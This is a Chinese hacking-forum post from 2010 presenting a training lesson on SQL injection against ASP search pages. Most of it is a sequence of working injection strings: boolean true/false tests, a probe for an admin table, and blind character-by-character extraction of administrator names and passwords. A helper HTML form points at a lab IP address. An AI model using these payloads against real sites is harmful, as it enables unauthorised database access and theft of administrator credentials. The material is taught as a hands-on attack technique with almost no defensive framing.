找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 961|回复: 0

脚本渗透第二十九课:asp搜索型注入

[复制链接]

72

主题

0

回帖

360

牛毛

一级牛人

积分
360
发表于 2010-12-30 23:26:59 | 显示全部楼层 |阅读模式 来自 贵州省黔东南州
饭客网络一周年免费培训之脚本渗透第二十九课:asp搜索型注入
www.hackfans.com.cn
饭客网络安全培训基地
中国最大的网络安全培训
只做网络安全 信息安全方面的培训
宗旨:坚持  宣传  信誉  实力  回报
专业培训网络信息安全人才  成就中国网络安全边防军团
--------------------------------------------------------------------------------
教程名称:asp搜索型注入

讲师:I.n.c゛啵、 QQ:380****7774

测试%' and 1=1 and '%'='     //1=1返回找到一个,即正常
测试%' and 1=2 and '%'='     //1=2显然不成立,找不到任何文章,即返回异常
测试%' and (select count(pass) from zm_admin) and '%'='  //返回正常说明存在zm_admin表
存在name和pass
测试%' and (select top 1 len(pass) from zm_admin)>1 and '%'='  

测试%' and (select top 1 asc(mid(name,4,1)) from zm_admin)>96 and '%'='
admin admin

--------------------------------------------------------
<html>
<form name="form1" method="post" action="http://192.168.1.102/search.asp">
  类型:
  <label>
  <input name="t" type="text" id="t" value="1">
  </label>
  <p>
    内容:
      <label>
    <input name="key" type="text" id="key">
    </label>
  </p>
  <p>
    <label>
    <input type="submit" name="Submit" value="提交">
    </label>
  </p>
</form>

教程下载地址:
http://www.hackfans.com.cn/mianfei/jiaoben/jb29rar
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-26 01:03 , Processed in 0.137676 second(s), 30 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表